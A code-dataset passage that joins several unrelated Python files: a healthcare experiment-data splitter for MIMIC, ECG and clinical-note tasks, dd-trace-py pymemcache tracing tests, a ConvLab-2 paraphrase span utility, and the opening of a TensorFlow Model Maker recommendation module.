expdata_statistic = {
'task':self.sel_task,
'raio': split_ratio,
'label_n': label_n,
'len_train': len(training_x),
'len_valid': len(validing_x),
'len_test': len(testing_x)
}
pickle.dump(expdata_statistic, open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
print('generate finished')
print('target Task:', expdata_statistic['task'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def load_exp_data(self):
if os.path.exists(self.expdata_dir) is False:
raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
training_x = pickle.load(open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
validing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
testing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
training_y = pickle.load(open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
validing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
testing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
expdata_statistic = pickle.load(open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
label_n = expdata_statistic['label_n']
self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
print('load finished')
print('target Task:', expdata_statistic['task'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def show_data(self, k=3):
"""
Parameters
----------
k : int, optional (default=3)
fetch k sample data for show
"""
print('------------Train--------------')
print('x_data', self.train['x'][:k])
print('y_data', self.train['y'][:k])
print('------------Valid--------------')
print('x_data', self.valid['x'][:k])
print('y_data', self.valid['y'][:k])
print('------------Test--------------')
print('x_data', self.test['x'][:k])
print('y_data', self.test['y'][:k])
class sequencedata:
def __init__(self, expdata_id, root_dir='.'):
"""
experiment data generat class for cms datasets
Parameters
----------
exp_id : str, optional (default='init.test')
name of current experiment
"""
self.expdata_id = expdata_id
check_expdata_dir(expdata_id = expdata_id)
self.root_dir = root_dir
self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
print(
'Current ExpData_ID: {0} --- Target for MIMIC'.format(
self.expdata_id))
def get_exp_data(self,
sel_task='phenotyping',
shuffle=True,
split_ratio=[0.64, 0.16, 0.2],
data_root = '',
n_limit = -1):
"""
Parameters
----------
task : str, optional (default='phenotyping')
name of current healthcare task
shuffle : bool, optional (default=True)
determine whether shuffle data or not
split_ratio : list, optional (default=[0.64,0.16,0.2])
used for split whole data into train/valid/test
data_root : str, optional (default='')
if data_root=='', use data in ./datasets; else use data in data_root
n_limit : int, optional (default = -1)
used for sample N-data not for all data, if n_limit==-1, use all data
"""
self.sel_task = sel_task
if data_root == '':
raise Exception('fill in correct data_root')
all_list = []
l_list = []
episode_dir = os.path.join(data_root, 'x_data')
feat_n, label_n = 0, 0
label_seq = pd.read_csv(os.path.join(data_root, 'y_data',
self.sel_task + '.csv')).values
for row_id in trange(len(label_seq)):
if n_limit>0 and row_id>n_limit:
break
time.sleep(0.01)
row = label_seq[row_id, :]
concrete_path = os.path.join(episode_dir, row[0])
if os.path.exists(concrete_path) is False:
continue
seq_l, feat_n_all = pd.read_csv(concrete_path).shape
if seq_l < 2:
continue
all_list.append([concrete_path] + [seq_l] + row[1:].astype(float).tolist())
label_n = len(row[1:])
feat_n = feat_n_all - 1
# shuffle the list
if shuffle:
random.shuffle(all_list)
N = len(all_list)
x_list = []
y_list = []
l_list = []
for item in all_list:
x_list.append(item[0])
l_list.append(item[1])
y_list.append(np.array(item[2:]).astype(float))
train_ratio = split_ratio[0]
valid_ratio = split_ratio[1]
training_x = x_list[: int(train_ratio * N)]
validing_x = x_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_x = x_list[int((train_ratio + valid_ratio) * N):]
training_y = y_list[: int(train_ratio * N)]
validing_y = y_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_y = y_list[int((train_ratio + valid_ratio) * N):]
training_l = l_list[: int(train_ratio * N)]
validing_l = l_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_l = l_list[int((train_ratio + valid_ratio) * N):]
if os.path.exists(self.expdata_dir) is False:
os.makedirs(self.expdata_dir)
pickle.dump(training_x, open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
pickle.dump(validing_x, open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
pickle.dump(testing_x, open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
print ('finished X generate')
pickle.dump(training_y, open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
pickle.dump(validing_y, open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
pickle.dump(testing_y, open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
print ('finished Y generate')
pickle.dump(training_l, open(
os.path.join(self.expdata_dir, 'train_l.pkl'), 'wb'))
pickle.dump(validing_l, open(
os.path.join(self.expdata_dir, 'valid_l.pkl'), 'wb'))
pickle.dump(testing_l, open(
os.path.join(self.expdata_dir, 'test_l.pkl'), 'wb'))
print ('finished L generate')
expdata_statistic = {
'task':self.sel_task,
'raio': split_ratio,
'feat_n': feat_n,
'label_n': label_n,
'len_train': len(training_x),
'len_valid': len(validing_x),
'len_test': len(testing_x)
}
pickle.dump(expdata_statistic, open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
self.train = {'x': training_x, 'y': training_y, 'l': training_l,
'feat_n': feat_n, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'l': validing_l,
'feat_n': feat_n, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'l': testing_l,
'feat_n': feat_n, 'label_n': label_n}
print('generate finished')
print('target Task:', expdata_statistic['task'])
print('N of features:', expdata_statistic['feat_n'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def load_exp_data(self):
if os.path.exists(self.expdata_dir) is False:
raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
training_x = pickle.load(open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
validing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
testing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
training_y = pickle.load(open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
validing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
testing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
training_l = pickle.load(open(
os.path.join(self.expdata_dir, 'train_l.pkl'), 'rb'))
validing_l = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_l.pkl'), 'rb'))
testing_l = pickle.load(open(
os.path.join(self.expdata_dir, 'test_l.pkl'), 'rb'))
expdata_statistic = pickle.load(open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
feat_n = expdata_statistic['feat_n']
label_n = expdata_statistic['label_n']
self.train = {'x': training_x, 'y': training_y, 'l': training_l,
'feat_n': feat_n, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'l': validing_l,
'feat_n': feat_n, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'l': testing_l,
'feat_n': feat_n, 'label_n': label_n}
print('load finished')
print('target Task:', expdata_statistic['task'])
print('N of features:', expdata_statistic['feat_n'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def show_data(self, k=3):
"""
Parameters
----------
k : int, optional (default=3)
fetch k sample data for show
"""
print('------------Train--------------')
print('x_data', self.train['x'][:k])
print('y_data', self.train['y'][:k])
print('l_data', self.train['l'][:k])
print('------------Valid--------------')
print('x_data', self.valid['x'][:k])
print('y_data', self.valid['y'][:k])
print('l_data', self.valid['l'][:k])
print('------------Test--------------')
print('x_data', self.test['x'][:k])
print('y_data', self.test['y'][:k])
print('l_data', self.test['l'][:k])
class ecgdata:
def __init__(self, expdata_id, root_dir='.'):
"""
experiment data generat class for cms datasets
Parameters
----------
exp_id : str, optional (default='init.test')
name of current experiment
"""
self.expdata_id = expdata_id
check_expdata_dir(expdata_id = expdata_id)
self.root_dir = root_dir
self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
print(
'Current ExpData_ID: {0} --- Target for ECG'.format(
self.expdata_id))
def get_exp_data(self,
sel_task='diagnose',
shuffle=True,
split_ratio=[0.64, 0.16, 0.2],
data_root = '',
n_limit = -1):
"""
Parameters
----------
task : str, optional (default='phenotyping')
name of current healthcare task
shuffle : bool, optional (default=True)
determine whether shuffle data or not
split_ratio : list, optional (default=[0.64,0.16,0.2])
used for split whole data into train/valid/test
data_root : str, optional (default='')
if data_root=='', use data in ./datasets; else use data in data_root
n_limit : int, optional (default = -1)
used for sample N-data not for all data, if n_limit==-1, use all data
"""
self.sel_task = sel_task
if data_root == '':
raise Exception('fill in correct data_root')
all_list = []
l_list = []
episode_dir = os.path.join(data_root, 'x_data')
feat_n, label_n = 0, 0
feat_seq = pickle.load(open(os.path.join(data_root, 'x_data', 'feat.pkl'), 'rb'))
label_seq = pickle.load(open(os.path.join(data_root, 'y_data', self.sel_task + '.pkl'), 'rb'))
label_n = np.shape(label_seq)[1]
feat_n = np.shape(feat_seq)[1]
for cur_i, each_label in enumerate(label_seq):
all_list.append(each_label.tolist() + feat_seq[cur_i].tolist())
# shuffle the list
if shuffle:
random.shuffle(all_list)
N = len(all_list)
x_list = []
y_list = []
for item in all_list:
x_list.append(np.array(item[label_n:]).astype(float))
y_list.append(np.array(item[:label_n]).astype(float))
train_ratio = split_ratio[0]
valid_ratio = split_ratio[1]
training_x = x_list[: int(train_ratio * N)]
validing_x = x_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_x = x_list[int((train_ratio + valid_ratio) * N):]
training_y = y_list[: int(train_ratio * N)]
validing_y = y_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_y = y_list[int((train_ratio + valid_ratio) * N):]
if os.path.exists(self.expdata_dir) is False:
os.makedirs(self.expdata_dir)
pickle.dump(training_x, open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
pickle.dump(validing_x, open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
pickle.dump(testing_x, open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
print ('finished X generate')
pickle.dump(training_y, open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
pickle.dump(validing_y, open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
pickle.dump(testing_y, open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
print ('finished Y generate')
expdata_statistic = {
'task':self.sel_task,
'raio': split_ratio,
'feat_n': feat_n,
'label_n': label_n,
'len_train': len(training_x),
'len_valid': len(validing_x),
'len_test': len(testing_x)
}
pickle.dump(expdata_statistic, open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
self.train = {'x': training_x, 'y': training_y,
'feat_n': feat_n, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y,
'feat_n': feat_n, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y,
'feat_n': feat_n, 'label_n': label_n}
print('generate finished')
print('target Task:', expdata_statistic['task'])
print('N of features:', expdata_statistic['feat_n'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def load_exp_data(self):
if os.path.exists(self.expdata_dir) is False:
raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
training_x = pickle.load(open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
validing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
testing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
training_y = pickle.load(open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
validing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
testing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
expdata_statistic = pickle.load(open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
feat_n = expdata_statistic['feat_n']
label_n = expdata_statistic['label_n']
self.train = {'x': training_x, 'y': training_y,
'feat_n': feat_n, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y,
'feat_n': feat_n, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y,
'feat_n': feat_n, 'label_n': label_n}
print('load finished')
print('target Task:', expdata_statistic['task'])
print('N of features:', expdata_statistic['feat_n'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def show_data(self, k=3):
"""
Parameters
----------
k : int, optional (default=3)
fetch k sample data for show
"""
print('------------Train--------------')
print('x_data', self.train['x'][:k])
print('y_data', self.train['y'][:k])
print('------------Valid--------------')
print('x_data', self.valid['x'][:k])
print('y_data', self.valid['y'][:k])
print('------------Test--------------')
print('x_data', self.test['x'][:k])
print('y_data', self.test['y'][:k])
class textdata:
def __init__(self, expdata_id, root_dir='.'):
"""
experiment data generat class for cms datasets
Parameters
----------
exp_id : str, optional (default='init.test')
name of current experiment
"""
self.expdata_id = expdata_id
check_expdata_dir(expdata_id = expdata_id)
self.root_dir = root_dir
self.expdata_dir = os.path.join(self.root_dir, 'experiments_data', self.expdata_id)
print(
'Current ExpData_ID: {0} --- Target for Clinical Notes'.format(
self.expdata_id))
def get_exp_data(self,
sel_task='diagnose',
shuffle=True,
split_ratio=[0.64, 0.16, 0.2],
data_root = '',
n_limit = -1):
"""
Parameters
----------
task : str, optional (default='phenotyping')
name of current healthcare task
shuffle : bool, optional (default=True)
determine whether shuffle data or not
split_ratio : list, optional (default=[0.64,0.16,0.2])
used for split whole data into train/valid/test
data_root : str, (default='')
use data in data_root
n_limit : int, optional (default = -1)
used for sample N-data not for all data, if n_limit==-1, use all data
"""
self.sel_task = sel_task
if data_root == '':
raise Exception('fill in correct data_root')
all_list = []
l_list = []
episode_dir = os.path.join(data_root, 'x_data')
feat_n, label_n = 0, 0
label_seq = pd.read_csv(os.path.join(data_root, 'y_data',
self.sel_task + '.csv')).values
for row_id in trange(len(label_seq)):
if n_limit>0 and row_id>n_limit:
break
time.sleep(0.01)
row = label_seq[row_id, :]
concrete_path = os.path.join(episode_dir, row[0])
if os.path.exists(concrete_path) is False:
continue
all_list.append([concrete_path] + row[1:].astype(float).tolist())
label_n = len(row[1:])
# shuffle the list
if shuffle:
random.shuffle(all_list)
N = len(all_list)
x_list = []
y_list = []
for item in all_list:
x_list.append(item[0])
y_list.append(np.array(item[1:]).astype(float))
train_ratio = split_ratio[0]
valid_ratio = split_ratio[1]
training_x = x_list[: int(train_ratio * N)]
validing_x = x_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_x = x_list[int((train_ratio + valid_ratio) * N):]
training_y = y_list[: int(train_ratio * N)]
validing_y = y_list[int(train_ratio * N): int(
(train_ratio + valid_ratio) * N)]
testing_y = y_list[int((train_ratio + valid_ratio) * N):]
if os.path.exists(self.expdata_dir) is False:
os.makedirs(self.expdata_dir)
pickle.dump(training_x, open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'wb'))
pickle.dump(validing_x, open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'wb'))
pickle.dump(testing_x, open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'wb'))
print ('finished X generate')
pickle.dump(training_y, open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'wb'))
pickle.dump(validing_y, open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'wb'))
pickle.dump(testing_y, open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'wb'))
print ('finished Y generate')
expdata_statistic = {
'task':self.sel_task,
'raio': split_ratio,
'label_n': label_n,
'len_train': len(training_x),
'len_valid': len(validing_x),
'len_test': len(testing_x)
}
pickle.dump(expdata_statistic, open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'wb'))
self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
print('generate finished')
print('target Task:', expdata_statistic['task'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def load_exp_data(self):
if os.path.exists(self.expdata_dir) is False:
raise Exception('cannot find exp data dir {0}'.format(self.expdata_dir))
training_x = pickle.load(open(
os.path.join(self.expdata_dir, 'train_x.pkl'), 'rb'))
validing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_x.pkl'), 'rb'))
testing_x = pickle.load(open(
os.path.join(self.expdata_dir, 'test_x.pkl'), 'rb'))
training_y = pickle.load(open(
os.path.join(self.expdata_dir, 'train_y.pkl'), 'rb'))
validing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'valid_y.pkl'), 'rb'))
testing_y = pickle.load(open(
os.path.join(self.expdata_dir, 'test_y.pkl'), 'rb'))
expdata_statistic = pickle.load(open(
os.path.join(self.expdata_dir, 'expdata_statistic.pkl'), 'rb'))
label_n = expdata_statistic['label_n']
self.train = {'x': training_x, 'y': training_y, 'label_n': label_n}
self.valid = {'x': validing_x, 'y': validing_y, 'label_n': label_n}
self.test = {'x': testing_x, 'y': testing_y, 'label_n': label_n}
print('load finished')
print('target Task:', expdata_statistic['task'])
print('N of labels:', expdata_statistic['label_n'])
print('N of TrainData:', expdata_statistic['len_train'])
print('N of ValidData:', expdata_statistic['len_valid'])
print('N of TestData:', expdata_statistic['len_test'])
def show_data(self, k=3):
"""
Parameters
----------
k : int, optional (default=3)
fetch k sample data for show
"""
print('------------Train--------------')
print('x_data', self.train['x'][:k])
print('y_data', self.train['y'][:k])
print('------------Valid--------------')
print('x_data', self.valid['x'][:k])
print('y_data', self.valid['y'][:k])
print('------------Test--------------')
print('x_data', self.test['x'][:k])
print('y_data', self.test['y'][:k])
if __name__ == '__main__':
print ('hello world')
test_txt = textdata('test.1.text')
test_txt.get_exp_data(sel_task='diagnose',data_root = './datasets/text')
test_txt.load_exp_data() |
tests/contrib/pymemcache/test_client.py | p7g/dd-trace-py | 308 | 12748161 | # 3p
import pymemcache
from pymemcache.exceptions import MemcacheClientError
from pymemcache.exceptions import MemcacheIllegalInputError
from pymemcache.exceptions import MemcacheServerError
from pymemcache.exceptions import MemcacheUnknownCommandError
from pymemcache.exceptions import MemcacheUnknownError
import pytest
# project
from ddtrace import Pin
from ddtrace.contrib.pymemcache.client import WrappedClient
from ddtrace.contrib.pymemcache.patch import patch
from ddtrace.contrib.pymemcache.patch import unpatch
from ddtrace.vendor import wrapt
from tests.utils import DummyTracer
from tests.utils import TracerTestCase
from .test_client_mixin import PYMEMCACHE_VERSION
from .test_client_mixin import PymemcacheClientTestCaseMixin
from .test_client_mixin import TEST_HOST
from .test_client_mixin import TEST_PORT
from .utils import MockSocket
from .utils import _str
_Client = pymemcache.client.base.Client
class PymemcacheClientTestCase(PymemcacheClientTestCaseMixin):
"""Tests for a patched pymemcache.client.base.Client."""
def test_patch(self):
assert issubclass(pymemcache.client.base.Client, wrapt.ObjectProxy)
client = self.make_client([])
self.assertIsInstance(client, wrapt.ObjectProxy)
def test_unpatch(self):
unpatch()
from pymemcache.client.base import Client
self.assertEqual(Client, _Client)
def test_set_get(self):
client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"])
client.set(b"key", b"value", noreply=False)
result = client.get(b"key")
assert _str(result) == "value"
self.check_spans(2, ["set", "get"], ["set key", "get key"])
def test_append_stored(self):
client = self.make_client([b"STORED\r\n"])
result = client.append(b"key", b"value", noreply=False)
assert result is True
self.check_spans(1, ["append"], ["append key"])
def test_prepend_stored(self):
client = self.make_client([b"STORED\r\n"])
result = client.prepend(b"key", b"value", noreply=False)
assert result is True
self.check_spans(1, ["prepend"], ["prepend key"])
def test_cas_stored(self):
client = self.make_client([b"STORED\r\n"])
result = client.cas(b"key", b"value", b"0", noreply=False)
assert result is True
self.check_spans(1, ["cas"], ["cas key"])
def test_cas_exists(self):
client = self.make_client([b"EXISTS\r\n"])
result = client.cas(b"key", b"value", b"0", noreply=False)
assert result is False
self.check_spans(1, ["cas"], ["cas key"])
def test_cas_not_found(self):
client = self.make_client([b"NOT_FOUND\r\n"])
result = client.cas(b"key", b"value", b"0", noreply=False)
assert result is None
self.check_spans(1, ["cas"], ["cas key"])
def test_delete_exception(self):
client = self.make_client([Exception("fail")])
def _delete():
client.delete(b"key", noreply=False)
pytest.raises(Exception, _delete)
spans = self.check_spans(1, ["delete"], ["delete key"])
self.assertEqual(spans[0].error, 1)
def test_flush_all(self):
client = self.make_client([b"OK\r\n"])
result = client.flush_all(noreply=False)
assert result is True
self.check_spans(1, ["flush_all"], ["flush_all"])
def test_incr_exception(self):
client = self.make_client([Exception("fail")])
def _incr():
client.incr(b"key", 1)
pytest.raises(Exception, _incr)
spans = self.check_spans(1, ["incr"], ["incr key"])
self.assertEqual(spans[0].error, 1)
def test_get_error(self):
client = self.make_client([b"ERROR\r\n"])
def _get():
client.get(b"key")
pytest.raises(MemcacheUnknownCommandError, _get)
spans = self.check_spans(1, ["get"], ["get key"])
self.assertEqual(spans[0].error, 1)
def test_get_unknown_error(self):
client = self.make_client([b"foobarbaz\r\n"])
def _get():
client.get(b"key")
pytest.raises(MemcacheUnknownError, _get)
self.check_spans(1, ["get"], ["get key"])
def test_gets_found(self):
client = self.make_client([b"VALUE key 0 5 10\r\nvalue\r\nEND\r\n"])
result = client.gets(b"key")
assert result == (b"value", b"10")
self.check_spans(1, ["gets"], ["gets key"])
def test_touch_not_found(self):
client = self.make_client([b"NOT_FOUND\r\n"])
result = client.touch(b"key", noreply=False)
assert result is False
self.check_spans(1, ["touch"], ["touch key"])
def test_set_client_error(self):
client = self.make_client([b"CLIENT_ERROR some message\r\n"])
def _set():
client.set("key", "value", noreply=False)
pytest.raises(MemcacheClientError, _set)
spans = self.check_spans(1, ["set"], ["set key"])
self.assertEqual(spans[0].error, 1)
def test_set_server_error(self):
client = self.make_client([b"SERVER_ERROR some message\r\n"])
def _set():
client.set(b"key", b"value", noreply=False)
pytest.raises(MemcacheServerError, _set)
spans = self.check_spans(1, ["set"], ["set key"])
self.assertEqual(spans[0].error, 1)
def test_set_key_with_space(self):
client = self.make_client([b""])
def _set():
client.set(b"key has space", b"value", noreply=False)
pytest.raises(MemcacheIllegalInputError, _set)
spans = self.check_spans(1, ["set"], ["set key has space"])
self.assertEqual(spans[0].error, 1)
def test_quit(self):
client = self.make_client([])
result = client.quit()
assert result is None
self.check_spans(1, ["quit"], ["quit"])
def test_replace_not_stored(self):
client = self.make_client([b"NOT_STORED\r\n"])
result = client.replace(b"key", b"value", noreply=False)
assert result is False
self.check_spans(1, ["replace"], ["replace key"])
def test_version_success(self):
client = self.make_client([b"VERSION 1.2.3\r\n"], default_noreply=False)
result = client.version()
assert result == b"1.2.3"
self.check_spans(1, ["version"], ["version"])
def test_stats(self):
client = self.make_client([b"STAT fake_stats 1\r\n", b"END\r\n"])
result = client.stats()
if PYMEMCACHE_VERSION >= (3, 4, 0):
assert client.sock.send_bufs == [b"stats\r\n"]
else:
assert client.sock.send_bufs == [b"stats \r\n"]
assert result == {b"fake_stats": 1}
self.check_spans(1, ["stats"], ["stats"])
def test_service_name_override(self):
client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"])
Pin.override(client, service="testsvcname")
client.set(b"key", b"value", noreply=False)
result = client.get(b"key")
assert _str(result) == "value"
spans = self.get_spans()
self.assertEqual(spans[0].service, "testsvcname")
self.assertEqual(spans[1].service, "testsvcname")
class PymemcacheHashClientTestCase(PymemcacheClientTestCaseMixin):
"""Tests for a patched pymemcache.client.hash.HashClient."""
def make_client_pool(self, hostname, mock_socket_values, serializer=None, **kwargs):
mock_client = pymemcache.client.base.Client(hostname, serializer=serializer, **kwargs)
tracer = DummyTracer()
Pin.override(mock_client, tracer=tracer)
mock_client.sock = MockSocket(mock_socket_values)
client = pymemcache.client.base.PooledClient(hostname, serializer=serializer)
client.client_pool = pymemcache.pool.ObjectPool(lambda: mock_client)
return mock_client
def make_client(self, mock_socket_values, **kwargs):
from pymemcache.client.hash import HashClient
tracer = DummyTracer()
Pin.override(pymemcache, tracer=tracer)
self.client = HashClient([(TEST_HOST, TEST_PORT)], **kwargs)
for _c in self.client.clients.values():
_c.sock = MockSocket(list(mock_socket_values))
return self.client
def test_patched_hash_client(self):
client = self.make_client([b"STORED\r\n"])
if PYMEMCACHE_VERSION >= (3, 2, 0):
assert client.client_class == WrappedClient
assert len(client.clients)
for _c in client.clients.values():
assert isinstance(_c, wrapt.ObjectProxy)
def test_delete_many_found(self):
"""
delete_many internally calls client.delete so we should expect to get
delete for our span resource.
for base.Clients self.delete() is called which by-passes our tracing
on delete()
"""
client = self.make_client([b"STORED\r", b"\n", b"DELETED\r\n"])
result = client.add(b"key", b"value", noreply=False)
result = client.delete_many([b"key"], noreply=False)
assert result is True
self.check_spans(2, ["add", "delete"], ["add key", "delete key"])
class PymemcacheClientConfiguration(TracerTestCase):
"""Ensure that pymemache can be configured properly."""
def setUp(self):
patch()
def tearDown(self):
unpatch()
def make_client(self, mock_socket_values, **kwargs):
tracer = DummyTracer()
Pin.override(pymemcache, tracer=tracer)
self.client = pymemcache.client.base.Client((TEST_HOST, TEST_PORT), **kwargs)
self.client.sock = MockSocket(list(mock_socket_values))
return self.client
def test_same_tracer(self):
"""Ensure same tracer reference is used by the pin on pymemache and
Clients.
"""
client = pymemcache.client.base.Client((TEST_HOST, TEST_PORT))
self.assertEqual(Pin.get_from(client).tracer, Pin.get_from(pymemcache).tracer)
def test_override_parent_pin(self):
"""Test that the service set on `pymemcache` is used for Clients."""
Pin.override(pymemcache, service="mysvc")
client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"])
client.set(b"key", b"value", noreply=False)
pin = Pin.get_from(pymemcache)
tracer = pin.tracer
spans = tracer.pop()
self.assertEqual(spans[0].service, "mysvc")
def test_override_client_pin(self):
"""Test that the service set on `pymemcache` is used for Clients."""
client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"])
Pin.override(client, service="mysvc2")
client.set(b"key", b"value", noreply=False)
pin = Pin.get_from(pymemcache)
tracer = pin.tracer
spans = tracer.pop()
self.assertEqual(spans[0].service, "mysvc2")
@TracerTestCase.run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_user_specified_service(self):
"""
When a user specifies a service for the app
The pymemcache integration should not use it.
"""
# Ensure that the service name was configured
from ddtrace import config
assert config.service == "mysvc"
client = self.make_client([b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"])
client.set(b"key", b"value", noreply=False)
pin = Pin.get_from(pymemcache)
tracer = pin.tracer
spans = tracer.pop()
assert spans[0].service != "mysvc"
|
convlab2/laug/Text_Paraphrasing/utils.py | ljw23/ConvLab-2 | 339 | 12748173 | # -*- coding: utf-8 -*-
from convlab2.util.multiwoz.paraphrase_span_detection import phrase_idx_utt
def paraphrase_span_detection(new_text,span_info):
new_words=new_text.split()
new_span_info=[]
for span in span_info:
span_words=span[2].split()
result=phrase_idx_utt(span_words,new_words)
if result is not None:
max_start,max_end=result
new_span_info.append([span[0],span[1],' '.join(new_words[max_start:max_end+1]),max_start,max_end])
return new_span_info
def span2tuple(span_info):
t=[]
for span in span_info:
t.append((span[0].split('-')[1],span[0].split('-')[0],span[1],span[2]))
return t |
tensorflow_examples/lite/model_maker/core/task/recommendation.py | duy-maimanh/examples | 6,484 | 12748193 | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""APIs to train an on-device recommendation model."""
import collections
import tempfile
import numpy as np
import tensorflow as tf
from tensorflow_examples.lite.model_maker.core.api import mm_export
from tensorflow_examples.lite.model_maker.core.data_util import data_util
